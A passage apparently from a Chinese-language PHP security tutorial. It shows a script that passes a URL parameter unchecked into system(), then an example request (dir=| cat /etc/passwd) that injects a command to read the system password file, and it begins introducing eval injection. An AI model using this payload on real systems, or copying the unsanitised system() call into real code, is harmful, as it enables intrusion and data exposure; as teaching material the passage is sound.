3.
$dir
=
$_GET
[
"dir"
];
4.
if
(isset(
$dir
))
5. {
6.
echo
"
"
;
7.
system(
"ls -al "
.
$dir
);
8.
echo
"
"
;
9. }
10. ?>
我们提交
http://www.sectop.com/ex1.php?dir
=| cat /etc/passwd
提交以后,命令变成了 system("ls -al | cat /etc/passwd");
eval 注入攻击
eval 函数将输入的字符串参数当作 PHP 程序代码来执行
函数原型:
mixed eval(string code_str) //eval 注入一般发生在攻击者能控制输入的字符串的时候